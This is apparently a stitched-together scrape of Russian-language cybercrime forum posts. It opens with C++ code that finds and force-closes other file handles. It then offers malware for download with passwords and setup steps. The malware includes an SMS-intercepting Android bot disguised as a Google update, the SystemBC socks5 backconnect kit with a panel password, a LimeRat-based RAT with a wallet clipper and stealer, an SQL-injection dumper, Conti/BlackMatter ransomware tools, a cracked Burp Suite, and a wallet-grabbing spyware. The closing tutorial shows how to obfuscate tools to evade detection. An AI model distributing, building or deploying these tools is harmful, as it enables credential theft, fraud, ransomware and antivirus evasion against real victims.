BOOLEAN SecurityRequired;
BOOLEAN MaintainHandleCount;
USHORT MaintainTypeList;
POOL_TYPE PoolType;
ULONG PagedPoolUsage;
ULONG NonPagedPoolUsage;
} OBJECT_TYPE_INFORMATION, * POBJECT_TYPE_INFORMATION;
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
USHORT ProcessID;
USHORT CreatorBackTraceIndex;
UCHAR ObjectTypeIndex;
UCHAR HandleAttributes;
USHORT HandleValue;
PVOID Object;
ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG NumberOfHandles;
SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
BOOL GetFileNameFromHandle(HANDLE hFile, WCHAR* fName)
{
BOOL bSuccess = FALSE;
TCHAR pszFilename[MAX_PATH + 1];
HANDLE hFileMap;
hFileMap = CreateFileMappingW(hFile, NULL, PAGE_READONLY, 0, 0, NULL);
if (hFileMap)
{
void* pMem = MapViewOfFile(hFileMap, FILE_MAP_READ, 0, 0, 1);
if (pMem)
{
if (GetMappedFileName(GetCurrentProcess(), pMem, pszFilename, MAX_PATH))
{
TCHAR szTemp[BUFSIZE];
szTemp[0] = '\0';
if (GetLogicalDriveStrings(BUFSIZE - 1, szTemp))
{
TCHAR szName[MAX_PATH];
TCHAR szDrive[3] = TEXT(" :");
BOOL bFound = FALSE;
TCHAR* p = szTemp;
do
{
*szDrive = *p;
if (QueryDosDevice(szDrive, szName, MAX_PATH))
{
size_t uNameLen = _tcslen(szName);
if (uNameLen < MAX_PATH)
{
bFound = _tcsnicmp(pszFilename, szName, uNameLen) == 0
&& *(pszFilename + uNameLen) == _T('\\');
if (bFound)
{
TCHAR szTempFile[MAX_PATH];
StringCchPrintf(szTempFile, MAX_PATH, TEXT("%s%s"), szDrive, pszFilename + uNameLen);
StringCchCopyN(pszFilename, MAX_PATH + 1, szTempFile, _tcslen(szTempFile));
}
}
}
while (*p++);
} while (!bFound && *p);
}
}
bSuccess = TRUE;
UnmapViewOfFile(pMem);
}
CloseHandle(hFileMap);
}
else {
CloseHandle(hFileMap);
return bSuccess;
}
wcscpy_s(fName, MAX_PATH, pszFilename);
return bSuccess;
}
extern "C" __declspec(dllexport) int CloseHandles(WCHAR * fileName) {
fNtDuplicateObject NtDuplicateObject = (fNtDuplicateObject)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtDuplicateObject");
fNtQuerySystemInformation NtQuerySystemInformation = (fNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll"), "NtQuerySystemInformation");
fNtQueryObject NtQueryObject = (fNtQueryObject)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQueryObject");
ULONG returnLenght = 0;
PSYSTEM_HANDLE_INFORMATION handleTableInformation = (PSYSTEM_HANDLE_INFORMATION)malloc(SystemHandleInformationSize);
NtQuerySystemInformation(SystemHandleInformation, handleTableInformation, SystemHandleInformationSize, &returnLenght);
int PID = _getpid();
for (int i = 0; i < handleTableInformation->NumberOfHandles; i++) {
SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = (SYSTEM_HANDLE_TABLE_ENTRY_INFO)handleTableInformation->Handles[i];
if (handleInfo.ProcessID == PID)
{
HANDLE processHandle = NULL;
HANDLE dupHandle = NULL;
if (!(processHandle = OpenProcess(PROCESS_DUP_HANDLE, FALSE, handleInfo.ProcessID))) {
continue;
}
if (!NT_SUCCESS(NtDuplicateObject(processHandle, (HANDLE)handleInfo.HandleValue, GetCurrentProcess(), &dupHandle, GENERIC_READ, 0, DUPLICATE_SAME_ACCESS))) {
CloseHandle(processHandle);
CloseHandle(dupHandle);
continue;
}
POBJECT_TYPE_INFORMATION objectTypeInfo = (POBJECT_TYPE_INFORMATION)malloc(ObjectTypeInformationSize);
if (!NT_SUCCESS(NtQueryObject(dupHandle, ObjectTypeInformation, objectTypeInfo, ObjectTypeInformationSize, NULL)))
{
free(objectTypeInfo); CloseHandle(processHandle); CloseHandle(dupHandle);
continue;
}
if (wcscmp(objectTypeInfo->Name.Buffer, L"File"))
{
free(objectTypeInfo); CloseHandle(processHandle); CloseHandle(dupHandle);
continue;
}
WCHAR* wHandleFileName = new WCHAR[MAX_PATH]();
if (!GetFileNameFromHandle(dupHandle, wHandleFileName))
{
free(objectTypeInfo); free(wHandleFileName); CloseHandle(processHandle); CloseHandle(dupHandle);
continue;
}
if (fileName == std::wstring(wHandleFileName)) {
CloseHandle(dupHandle);
dupHandle = NULL;
NtDuplicateObject(processHandle, (HANDLE)handleInfo.HandleValue, GetCurrentProcess(), &dupHandle, GENERIC_READ, 0, DUPLICATE_CLOSE_SOURCE);
free(objectTypeInfo); free(wHandleFileName); CloseHandle(dupHandle); CloseHandle(processHandle);
break;
}
free(objectTypeInfo); free(wHandleFileName); CloseHandle(dupHandle); CloseHandle(processHandle);
}
}
return 0;
}
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
PS. Забрасывать проект после окончания конкурса не планирую, так что можете писать в эту тему, если возникнут какие-то вопросы или проблемы. В меру своих способностей постараюсь помочь) Благодарю за внимание.
Привет форум! Решил покапатся с дрейнерами, какие есть слитые проекты (cо сслыками) с приличным кодом , люблю вкатыватся в подобное с примерами. Поиск выдал Solana drainer (скачал) и SpaceX (умер линк).
Всем привет! Кто нибудь пробовал брутить vk или avito с помощи гидры
стандартные функции: перехват/отправка смс, переадресация звонков
отличительная функция: сбор цц+вбв+full info
способ работы: fake обновление от google.
Скриншот
в данном боте антиабуза стоит, будьте внимательны при установке.
в файле site_config.php - в первой строке нужно дописать php
Только в образовательных целях - скачать :fuck:
! socks.exe стучит через 5 минут после запуска!
сервер имеет ограничение на число поддерживаемых socks5 соединений. не более 45151 соединений (порты 4000-49151)
1Gbit server / 1000 socks = 1 mbit per socks
windows:
запустить server.exe. ставитсЯ только на серверные ос (windows 2003 server, windows 2008 server etc...) в обычных сборках винды стоит лимит на количество открытых соединений
linux:
server.out добавить в исключения фаерволла. или выключить его
запускать так (рекомендуется из папки /root)
chmod 777 server.out
./server.out &
/www устанавливается в корневую директорию веб сервера. на windows
рекомендуется ставить IIS + php
http://yourserver/systembc/password.php отображает текущие онлайн соксы
(пароль adm443)
socks.exe - клиент (не скрываетсЯ в диспетчере)
socks.dll - клиент в виде dll (стартующаЯ функциЯ rundll)
socks2.dll - клиент в виде dll (если нет поддержки стартующей функции)
ATTENTION! socks.exe come online after 5 minutes from start!
server have limit supporting connections. no more 45151 (ports 4000-49151)
1Gbit server / 1000 socks = 1 mbit per socks
windows:
run server.exe. install only on server os (windows 2003 server, windows 2008 server etc...). not server os have limit connections
linux:
server.out need add to exception firewall or turn off it
run command (recomended from /root folder)
chmod 777 server.out
./server.out &
/www need install to root folder of web server. on windows recomended IIS +
php
http://yourserver/systembc/password.php show online sockses (pass adm443)
Download: https://anonfiles.com/r6Wf3dudye/socks5_backconnect_zip
Малый вес высокая скорость , подежка bit domain name coin / требуеться крипт / подойдет для личного пользования быстро разворачивать соксы.
Приветствую всех читателей этого мини-мануала (кроме самих тсов говно-софтов,
по типу papitos )
Сегодня я вам расскажу о такой замечательной утилите, как TotalCommander
(дальше мы будем ее называть TM
В ТМ есть все основные функции, для чека логов.
Расскажу о главном из них. Это быстрый чекер запросов по архивам.
Сейчас приведу пример.
Здесь у меня сумарно 4-5к логов, за 2018 год. Давайте представим, что из всей
этой массы нам нужны логи с запросом paypal.
Жмём на бинокль и далее выставляем следующие настройки
Нажимаем "начать поиск" И утилита начинает перебор всех архивов, папок в указанном месте.
По окончанию у меня вышел такой результат. Чекалось это все меньше минуты
(секунд 15-20)
Так можно найти абсолютно все, что вам нужно в логе. От простого запроса в
пароле, до сложных связок. Все можно детально настроить под себя и как нужно
ВАМ.
А платить таким школьникам, как papitos и отдавать 70
бачей за воздух, ну такое..)
Toolkit Conti & BlackMatter Ransomware.
Mega:
You must have at least 150 reaction(s) to view the content.
Представляю вам новый RAT 2021!!!
В основе лежит база всем известного LimeRat.
?Но в этой версии исправлены ошибки, добавлены новые модули и
изменены(Удалены) старые/(Подробнее смотри ниже).
Также хочу сказать что версия не окончательна и будут добавляться новые
возможности.
RAT полностью бесплатный.
Без склеек и прочего shits.
Но при установке на машину жертвы клиент может установить партнерскую ссылку(
а может и не установить).
На данный момент у стаба 7 детектов ,нужно криптовать.
У модулей2~3 детекта.
Для
анализа детектов разрешены только Dyncheck, avcheck, avbox, antiscan, run4me,
scan4me!
Запрещено сливать файлы и модули без крипта на VT и прочие сливающие
сканеры
?Base Features?
Connection️
Using pastebin.com and other site witch format "RAW" as ip:port , and Also
using multi-ports?
The communication between server & client is encrypted with AES?
Spreading?
Infecting all files and folders on USB drivers?
Anti Virtual Machines?
Uninstall itself if the machine is virtual to avoid scanning or analyzing ?
XMR
Miner️
High performance Monero CPU miner with user idle\active optimizations
DDoS️
Creating a powerful DDOS attack to make an online service unavailable?
Crypto Stealer?
Stealing Cryptocurrency sensitive data?
Screen-Locker?
Prevents user from accessing their Windows GUI ?
And more...?
Force enable Windows RDP?
Persistence?
File manager?
Passwords stealer?
Remote desktop?
Bitcoin grabber?
Downloader?
Keylogger REALTIME?
?+ Features?
Hide+ (protection is installed on the installation folder and the file)?
Wallet Clipper(17 unit)
Decred,LiteCoin,BitCoin,ZCash,Etherium,DogeCoin,Monero,
BitcoinCash,Komodo,Peercoin,BitCoinGold,Bytecoin,
DashCoin,CreditCard,QIWIRU,QIWIUA,Yandex Money)?
BlockAVR(block antivirus site and more....)?
Downloader+(Hide)?
"Black Hole"(vbs module for installation)?
Keylogger NET(all Email)?
Bypass Country?
Bypass Language?
Bypass UserName and PCname?
Antiprocess module?
CheckNET(Сheck for internet before installing)?
Safe Mode + Recovery point Delete(Run as administrator!!)?
Grabber file desktop?
(jpeg, jpg, doc, docx, txt, sql, dat, ini, pdf, rdp, xml, json, doc, docx,
xls, xlsx, zip, rar)
limit 500mb
Disable:Update + Windows Defender + SmartScreen (Run as administrator!!)?
Debug protection and attempts to check the file with antivirus?
Stealer browser(chromium based and gecko based browser(passwords,
credit cards,history,cookies,bookmarks,autofill.)?
XMRRIG Updated to version 6.3.30 (https://xmrig.com/docs/algorithms)?
DDOS Module Updated (new attack methods)?
VM+( Sandboxie + Vmware + Virtualbox and
more...)️
Ransomware
deleted️️
Spoiler: AHTUNG!!!
We do not make any warranty, terms, conditions, or representations
any kind, any express or implied, authorized or other regarding the software
including without limitations of any implied warranties or terms of goods,
satisfactory quality, fitness for special purposes, not violation or occurrence
from the direction, use or trade course.
Some states / jurisdictions do not allow an exception implied warranties,
so the above exclusion may not apply to you and you may have other legal rights different from the state to the state or jurisdictions.
without restriction to this, we warrant that the software will visit you
requirements or what the software works for free or error
uninterrupted or that defects in the software will be corrected.Click to expand...
По русски: Все ответственность за использование лежит только на вас.
Я не призываю вас использовать данное ПО в незаконных целях!
Spoiler: Скриншоты
Spoiler: Check detect
Spoiler: Download
Описание:
Инструмент для сканирования и поиска уязвимых веб-сайтов.
Особенности:
- Поддержка Мульти. Поисковая система в интернете (для поиска объектов
trajects);
- Автоматическое использование и анализ из списка URL-адресов;
- Автоматический поиск данных в массовом списке URL-адресов;
-- Автоматический анализатор точек инъекций с использованием URL, POST,
Cookies, логина пользователя или пароля пользователя;
- Dumper поддерживает сброс данных с многопоточностью (базы данных / таблицы
/ столбцы / выборка данных);
- Эксплоитер поддерживает до 100x потоков;
-Анализатор и Дампер поддерживает до 50 потоков;
- Усовершенствованные методы обхода WAF;
- Расширенный пользовательский запрос;
-- Dumper может сбрасывать большие объемы данных, с большим контролем
задержки каждого запроса (многопоточность);
- Простота переключения уязвимостей на уязвимости;
-Поддержка списка прокси ;
- База данных GeoIP;
-Внутренняя база данных;
- Мусорная Система;
-Для входа в админ-искатель;
- Хэш онлайн крекер;
- Обратный IP;
-Автономный .exe (без установки).
Description:
A tool to scan and find vulnerable websites.
Features:
-Supports Multi. Online search engine (to find the trajects);
-Automated exploiting and analyzing from a URL list;
-Automated search for data in a bulk URL list;
-Automated analyzer for injections points using URL, POST, Cookies, UserLogin or UserPassword;
-Dumper supports dumping data with multi-threading (databases/tables/columns/fetching data);
-Exploiter supports up to 100x threads;
-Analyzer and Dumper supports up to 50x threads;
-Advanced WAF bypass methods;
-Advanced custom query box;
-Dumper can dump large amounts of data, with greats control of delay each request (multi-threading);
-Easy switch vulnerabilities to vulnerabilities;
-Supports proxies list;
-GeoIP database;
-Internal database;
-Trash System;
-Admin login finder;
-Hash online cracker;
-Reverse IP;
-Standalone .exe (no install).
https://dropmefiles.com/441JR
pass : exploit.in
pass : exploit.in
В общем то исправлено всего два файла. Поправил несправедливость в виде строчки EICAR (подробнее https://xss.is/threads/51076/#post-328951). Так же убрал ненужные апдейт ридми и пр. Пожалуйста =)
Минимум 3 человека сдают его в аренду тут на форуме
мануалов по установке море
You must have at least 50 message(s) to view the content.
Правленая версия, все работает как часики
Работает на Андройд 10
Работает на прошивках Samsung one ui
Работает на прошивка Xiaomi miui 10-11
Работает на прошивках Oppo ColorOS
Стабильно работают 5-9 версии без 0 секунд и т.д.
Отключение Протекта работает на всех версиях!
Использовать только на виртуалке и в медицинской маске. Как обращаться с
крякнутыми версиями думаю все и так знают. За клей не отвечаю.
Полная инструкция по кряку тут
https://www.cnblogs.com/ssooking/p/12535998.html
Файлы тут. https://pan.baidu.com/s/1Ah-H0Eelvm8PmVZ0_Jvz6w (нужно
импортировать куки залогиненного юзера baidu.com со свежего лога что бы
скачать). Чуть позже залью на мегу эти файлы.
Как и обещал ранее, сливаю под хайд билд под Анубиса одного пид..а, который
любитель по ру работать и продавать этот говнобот.
Там и во всех предыдущих версиях мода нужно внести изменения в a8.php ну и
странно...этот билд еще команду на a22.php отправляет. Нам пока некогда да и
лень с этим говноботом разбираться. В архиве два билда, один с "супер" криптом
от этого горе продавца, второй уже чистый, где все видно и можно менять под
свои панели.
You must have at least 100 reaction(s) to view the content.
Рассказывать много не надо. burp suite pro крякнутый
https://yadi.sk/d/p75P9PgbZrGpMA
Пароль от архива местный.
Запуск:
java -Xbootclasspath/p:burp-loader-keygen.jar -jar
burpsuite_pro_v2.0.11beta.jar
Далее из burp-loader-keygen.jar генерируем лицензию, и активируем burp (только manual activation)
Привет, решил написать простенькую спайварь.
Spoiler: Version 1.0
малварщики, не бейте за питон
На данный момент отправка в телеграм, планирую делать панель и переносить
большую часть логики туда.
Функции:
Spoiler: Скриншоты
Spoiler: Настройки граббера по умолчанию
Guarda
Coinomi
Bitcoin
Electrum
Electrum-LTC
Zcash
Exodus
Jaxx
Monero
Binance
WalletWasabi
Atomic
Ledger live
Pidgin
snowflake-ssh
FileZilla
OBS-studio
WinAuth
Authy Desktop
MobaXterm
OpenVPN
Telegram Desktop
Можно добавить больше путей для поиска в файле wiretap\stealer\grabber.py
Так-же можете добавить больше браузеров в этих файлах:
wiretap\stealer\chromium\init.py
wiretap\stealer\gecko\init.py
Установка:
pip install -r requirements.txt
pyinstaller wiretap.py
Вы так-же можете уменьшить вес выходного файла удалив pip uninstall SpeechRecognition
но в таком случае распознавание речи не будет работать.
Spoiler: Version 2.0
Короче питон говно, было решено переписать билд на шарп. И сделать панельку.
Функции:
Spoiler: Установка
Внизу есть ссылки на стаб и панель.
pip install -r requirements.txt
python core\auth.py
(Выдаст логин и пароль для входа)python server.py
или открыть файл start.cmd
если вы на винде.Spoiler: Скриншоты
Download:
https://mega.nz/file/pAABQKQK#gZbt4smueD8CU1pnX_GXCTvt90jKRhY2V7ibe-aZd64
Pass: xss.is
Если нужна помощь, пишите в пм.
Изначально софт писался как билдер клиппера для продажи которые не задались, https://xss.is/threads/52411/ по моей просьбе тему закрыли.
Решил выложить в паблик, но раз паблик почему бы не потренится мне в этом и дополнить функционалом, да где то пабликом где то своим.
Получился не хилый комбайн для создания малвари.
Написан на C# .Net 4.0Click to expand...
Если кратко то на борту билдера:
В процессе личного использования некоторые билды уже отлетали на ВТ, но при
правильной настройке:
Остальной функционал смотрите на скринах:
Скачать Builder:
You must have at least 50 reaction(s) to view the content.
**Исходные коды всего проекта продам за - 50$
О багах, предложениях просьба отписываться в данной теме.
По мере возможности буду дополнять/исправлять/обновлять софт.**
Знаете, в современном жестоком мире, наши с вами редтимерские тулзы без обфускации и/или морфинга не живут долго. Морфить код можно по-разному, у каждого подхода есть свои преимущества и недостатки. Но наиболее простым, при этом практически всегда достаточным, на мой взгляд, является трансформация исходного кода. Не говоря уже о том, что для скриптовых языков этот способ — по сути единственный. Проблема в том, как разпарсить исходный код таким образом, чтобы он был понятен морферу?
Для каждого языка программирования скорее всего найдется одна лидирующая в парсинге этого языка библиотека. Для С/С++ — это очевидно будет libclang, для C# — это будет Roslyn, для JavaScript — это будет Esprima, ну и так далее. Но все эти библиотеки очень сильно отличаются друг от друга, как по API, так и по представлению абстрактного синтаксического дерева (AST). Более того, каждую из таких библиотек скорее всего придется использовать из своего языка, что сводит к минимуму возможность переиспользования кода морфера для разных языков, а переключать контекст своего мышления между ними накладно для уже стареющего мозга). Но у меня есть решение… наверное.
Когда динозавры были большими, еще существовал такой редактор кода, аля VSCode, который назывался Atom. Разрабатывали его в основном челики из GitHub, но когда мелкомягкие выкупили GitHub, стало понятно, что господин Atom уже не жилец, ибо нехер ВсКоду конкурентов иметь. Сейчас зомби редактор на базе Atom все еще существует, его разрабатывает комьюнити, но он уже давно не торт. Так вот, одной из интересных разработок команды редактора Atom была библиотека «Дерева сидетель» (она же tree-sitter). Смысл был в том, что подсветка синтаксиса классическими регулярочками была уж очень тупой, а запуск полноценного LSP для языка — уж очень накладным. Поэтому они решили запилить библиотеку, которая бы понимала все языки лучше, чем это делают регулярочки, но не слишком хорошо, чтобы оставаться быстрой. Эта библиотека основывалась на грамматиках, и могла отличить, условно, класс от функции. Понимаете, к чему я клоню?
Я тут попробовал поиспользовать tree-sitter для задач обфускации и морфинга моих редтимерских тулзов и мне в принципе понравилось. В процессе я написал маленькую библиотечку для модного молодежного Петона, которой, собственно, и спешу с вами поделиться. Назвал я ее «дерева переписыватель» в честь ее основы — «дерева сидельщика». Поскольку я использовал ее только на своих кодовых базах, в ней могут быть баги, но кто из нас не без греха?
Ну давайте начнем. Чтобы вы понимали, библиотека tree-sitter написана на чистом православном Цэ, поэтому в принципе ее можно использовать из любого языка при условии наличия нормальных байндингов. Я выбрал Петон потому, что не люблю страдать, элитные цэшные и плюсовые господа, можете портировать функционал библиотеки в свою уютные языки, я не против, только за.
Для Петона есть готовые байндинги, но они предполагают, что вы их соберете у
себя на компуктерах, а для этого нужно настраивать сишный тулчейн. Если он у
вас есть и вы чувствуете, что хотите приключений, дерзайте. Сама библиотека
тут: https://pypi.org/project/tree-sitter/ - а байндиги множества языков
можно найти тут: https://pypi.org/project/tree-sitter-languages/ - судя по
мануалу, собирается все достаточно просто, но… Страдать я не люблю, и для
таких же, как я, есть готовая сборка обоих библиотек:
https://pypi.org/project/tree-sitter-builds/ - она отстает от текущей
версии и в ней нет всякой так горячо любимой мной маргинальщины, типа Дэ, Нима
и всякого такого. Но зато она ставится одной командой «pip install tree-
sitter-builds» и пошуршали делать свои морферы. В общем, выбор за вами,
аргументом против установки бинарных пакетов часто бывает, что в них куда
легче встроить малварь, но не то, чтобы мы с вами сами проверяли каждый
скаченный пакет с интернетов даже в виде исходников, к тому же:
После того, как вы поставили петоновский байндинги для tree-sitter, просто берете мой модуль tree_rewriter.py и начинаем писать. В модуле всего два класса. Первый из них называется Rewriter. Это — базовый класс, от которого по моей задумке должен наследоваться класс, реализующий один алгоритм обфускации или морфинга. Класс абстрагирует для вас парсинг и обход AST-дерева по паттерну «Посетитель» (Visitor), то есть он сам найдет и рекурсивно посетит для вас все необходимые вам узлы, а вам останется только их подменить.
Вы создаете свой класс, наследуете его от Rewriter, в конструкторе вызываете родительский конструктор, передавая туда название языка, с которым вы будете работать. Далее, вызываете метод visit, который осуществит парсинг исходного кода, переданного в виде строки или в виде массива байт, а так же в динамике вызовет все методы посещения узлов, которые вы определите. Но об этом чуть позже.
Начнем мы рассматривать эту абстракцию с класса Dumper. У класса Rewriter есть метод dump, передав узел дерева в который вы в консоли увидите всю его структуру, включая все дочерние узлы. На мой вкус это — очень удобный способ исследовать структуру AST-дерева и выискивать то, что вам нужно. Но, когда вы только начинаете работать с AST-деревьями, бывает полезно просто вывести целиком дерево всего кода, который вы подаете на вход. Для этого я реализовал класс Dumper. Вам нужно создать объект этого класса, передав в конструктор название языка, который вы будете парсить. Затем при вызове метода visit в консоль будет выплюнуто AST-дерево целиком. Давайте посмотрим это на примере example1.py:
Python:Copy to clipboard
import tree_rewriter
test = {
'c': '''
int test(int a, int b, int c) {
return a + b - c;
}
''',
'cpp': '''
int test(int a, int b, int c) {
return a + b - c;
}
''',
'c_sharp': '''
int Test(int a, int b, int c) {
return a + b - c;
}
''',
'go': '''
func Test(a int, b int, c int) {
return a + b - c
}
''',
'javascript': '''
function test(a, b, c) {
return a + b - c;
}
''',
'php': '''
<?php
function test($a, $b, $c) {
return $a + $b - $c;
}
''',
'python': '''
def test(a: int, b: int, c: int) -> int:
return a + b - c
''',
'rust': '''
fn test(a: i32, b: i32, c: i32) -> i32 {
return a + b - c;
}
'''
}
for language in test.keys():
print("***", language.upper(), "***")
dumper = tree_rewriter.Dumper(language)
dumper.visit(test[language])
print()
Здесь в качестве примера я создаю словарь из имен языков и маленьких фрагментов кода на этих языках, потом я в цикле обхожу словарь и с помощью класса Dumper вывожу AST-деревья фрагментов кода для каждого из языков. Полный список доступных из коробки языков можно посмотреть в библиотеке tree-sitter- languages, их довольно много, но всякую маргинальщину, которой там нет придется руками дособирать по мануалам. Вот так выглядит вывод первого примера:
Code:Copy to clipboard
> python example1.py
*** C ***
translation_unit b'int test(int a, int b, int c)...'
function_definition b'int test(int a, int b, int c)...'
primitive_type b'int'
function_declarator b'test(int a, int b, int c)'
identifier b'test'
parameter_list b'(int a, int b, int c)'
( b'('
parameter_declaration b'int a'
primitive_type b'int'
identifier b'a'
, b','
parameter_declaration b'int b'
primitive_type b'int'
identifier b'b'
, b','
parameter_declaration b'int c'
primitive_type b'int'
identifier b'c'
) b')'
compound_statement b'{\n return a + b - ...'
{ b'{'
return_statement b'return a + b - c;'
return b'return'
binary_expression b'a + b - c'
binary_expression b'a + b'
identifier b'a'
+ b'+'
identifier b'b'
- b'-'
identifier b'c'
; b';'
} b'}'
*** CPP ***
translation_unit b'int test(int a, int b, int c)...'
function_definition b'int test(int a, int b, int c)...'
primitive_type b'int'
function_declarator b'test(int a, int b, int c)'
identifier b'test'
parameter_list b'(int a, int b, int c)'
( b'('
parameter_declaration b'int a'
primitive_type b'int'
identifier b'a'
, b','
parameter_declaration b'int b'
primitive_type b'int'
identifier b'b'
, b','
parameter_declaration b'int c'
primitive_type b'int'
identifier b'c'
) b')'
compound_statement b'{\n return a + b - ...'
{ b'{'
return_statement b'return a + b - c;'
return b'return'
binary_expression b'a + b - c'
binary_expression b'a + b'
identifier b'a'
+ b'+'
identifier b'b'
- b'-'
identifier b'c'
; b';'
} b'}'
*** C_SHARP ***
compilation_unit b'int Test(int a, int b, int c)...'
global_statement b'int Test(int a, int b, int c)...'
local_function_statement b'int Test(int a, int b, int c)...'
predefined_type b'int'
identifier b'Test'
parameter_list b'(int a, int b, int c)'
( b'('
parameter b'int a'
predefined_type b'int'
identifier b'a'
, b','
parameter b'int b'
predefined_type b'int'
identifier b'b'
, b','
parameter b'int c'
predefined_type b'int'
identifier b'c'
) b')'
block b'{\n return a + b - ...'
{ b'{'
return_statement b'return a + b - c;'
return b'return'
binary_expression b'a + b - c'
binary_expression b'a + b'
identifier b'a'
+ b'+'
identifier b'b'
- b'-'
identifier b'c'
; b';'
} b'}'
*** GO ***
source_file b'func Test(a int, b int, c int...'
function_declaration b'func Test(a int, b int, c int...'
func b'func'
identifier b'Test'
parameter_list b'(a int, b int, c int)'
( b'('
parameter_declaration b'a int'
identifier b'a'
type_identifier b'int'
, b','
parameter_declaration b'b int'
identifier b'b'
type_identifier b'int'
, b','
parameter_declaration b'c int'
identifier b'c'
type_identifier b'int'
) b')'
block b'{\n return a + b - ...'
{ b'{'
return_statement b'return a + b - c'
return b'return'
expression_list b'a + b - c'
binary_expression b'a + b - c'
binary_expression b'a + b'
identifier b'a'
+ b'+'
identifier b'b'
- b'-'
identifier b'c'
b'\n'
} b'}'
b'\n'
*** JAVASCRIPT ***
program b'function test(a, b, c) {\n ...'
function_declaration b'function test(a, b, c) {\n ...'
function b'function'
identifier b'test'
formal_parameters b'(a, b, c)'
( b'('
identifier b'a'
, b','
identifier b'b'
, b','
identifier b'c'
) b')'
statement_block b'{\n return a + b - ...'
{ b'{'
return_statement b'return a + b - c;'
return b'return'
binary_expression b'a + b - c'
binary_expression b'a + b'
identifier b'a'
+ b'+'
identifier b'b'
- b'-'
identifier b'c'
; b';'
} b'}'
*** PHP ***
program b'<?php\n function test($...'
php_tag b'<?php'
function_definition b'function test($a, $b, $c) {\n ...'
function b'function'
name b'test'
formal_parameters b'($a, $b, $c)'
( b'('
simple_parameter b'$a'
variable_name b'$a'
$ b'$'
name b'a'
, b','
simple_parameter b'$b'
variable_name b'$b'
$ b'$'
name b'b'
, b','
simple_parameter b'$c'
variable_name b'$c'
$ b'$'
name b'c'
) b')'
compound_statement b'{\n return $a + $b ...'
{ b'{'
return_statement b'return $a + $b - $c;'
return b'return'
binary_expression b'$a + $b - $c'
binary_expression b'$a + $b'
variable_name b'$a'
$ b'$'
name b'a'
+ b'+'
variable_name b'$b'
$ b'$'
name b'b'
- b'-'
variable_name b'$c'
$ b'$'
name b'c'
; b';'
} b'}'
*** PYTHON ***
module b'def test(a: int, b: int, c: i...'
function_definition b'def test(a: int, b: int, c: i...'
def b'def'
identifier b'test'
parameters b'(a: int, b: int, c: int)'
( b'('
typed_parameter b'a: int'
identifier b'a'
: b':'
type b'int'
identifier b'int'
, b','
typed_parameter b'b: int'
identifier b'b'
: b':'
type b'int'
identifier b'int'
, b','
typed_parameter b'c: int'
identifier b'c'
: b':'
type b'int'
identifier b'int'
) b')'
-> b'->'
type b'int'
identifier b'int'
: b':'
block b'return a + b - c'
return_statement b'return a + b - c'
return b'return'
binary_operator b'a + b - c'
binary_operator b'a + b'
identifier b'a'
+ b'+'
identifier b'b'
- b'-'
identifier b'c'
*** RUST ***
source_file b'fn test(a: i32, b: i32, c: i3...'
function_item b'fn test(a: i32, b: i32, c: i3...'
fn b'fn'
identifier b'test'
parameters b'(a: i32, b: i32, c: i32)'
( b'('
parameter b'a: i32'
identifier b'a'
: b':'
primitive_type b'i32'
, b','
parameter b'b: i32'
identifier b'b'
: b':'
primitive_type b'i32'
, b','
parameter b'c: i32'
identifier b'c'
: b':'
primitive_type b'i32'
) b')'
-> b'->'
primitive_type b'i32'
block b'{\n return a + b - ...'
{ b'{'
expression_statement b'return a + b - c;'
return_expression b'return a + b - c'
return b'return'
binary_expression b'a + b - c'
binary_expression b'a + b'
identifier b'a'
+ b'+'
identifier b'b'
- b'-'
identifier b'c'
; b';'
} b'}'
Структура дерева сначала выглядит очень страшно, но к этому быстро привыкаешь, ведь это не так сложно, как кажется. Вложенность (зависимости родитель- потомки) узлов дерева показана уровнем индентации (количеством пробелов) с начала строки. После пробелов идет тип узла дерева, а за типом небольшой фрагмент исходного кода, который соответствует этому узлу. Обратите внимание, что чтобы избежать слишком длинных строк, я обрезаю этот фрагмент до 32 символов, если фрагмент был обрезан, то он заканчивается на «...», что логично, наверное.
Изучив структуру AST-дерева вы можете понять, какие его узлы вас будут интересовать для реализации того, или иного алгоритма обфускации или морфинга. Чтобы произвести какую-то работу над определенным узлом вам нужно определить в своем классе метод «visit_<тип_узла>». Базовый класс при посещении узлов увидит ваши методы и вызовет их для узлов необходимого типа. Это реализуется через рефлекшн над атрибутами класса (такое страшное метапрограммирование, ууу), но не суть важно. Давайте рассмотрим простой пример (example2.py):
Python:Copy to clipboard
import tree_rewriter
import tree_sitter
class Inserter(tree_rewriter.Rewriter):
def __init__(self):
super().__init__("c")
def visit_return_statement(self, node: tree_sitter.Node):
self.insert_before(node, "/* BEFORE RETURN */")
self.insert_after(node, "/* AFTER RETURN */")
return False
class Replacer(tree_rewriter.Rewriter):
def __init__(self):
super().__init__("c")
def visit_return_statement(self, node: tree_sitter.Node):
self.replace_node(node, "return 0;")
return False
src = '''
void main(int argc, char** argv) {
return 100;
}
'''
inserter = Inserter()
replacer = Replacer()
print(inserter.visit(src))
print(replacer.visit(src))
В этом примере я объявил два класса, которые показывают, как происходит замена узлов на произвольный код (Replacer) и вставка произвольного кода до и после узла (Inserter). По сути, этих трех примитивных действий над кодом достаточно, чтобы реализовать достаточно сложные алгоритмы обфускации. И там, и там я определил метод «visit_return_statement», который автоматически вызывается, когда базовый класс встречает в дереве узел типа «return_statement», то есть выражение return. Методы с говорящими названиями заменяют узел (replace_node), вставляют код до узла (insert_before) или после узла (insert_after). Давайте посмотрим, что выходит из этого в результате:
Code:Copy to clipboard
> python example2.py
void main(int argc, char** argv) {
/* BEFORE RETURN */return 100;/* AFTER RETURN */
}
void main(int argc, char** argv) {
return 0;
}
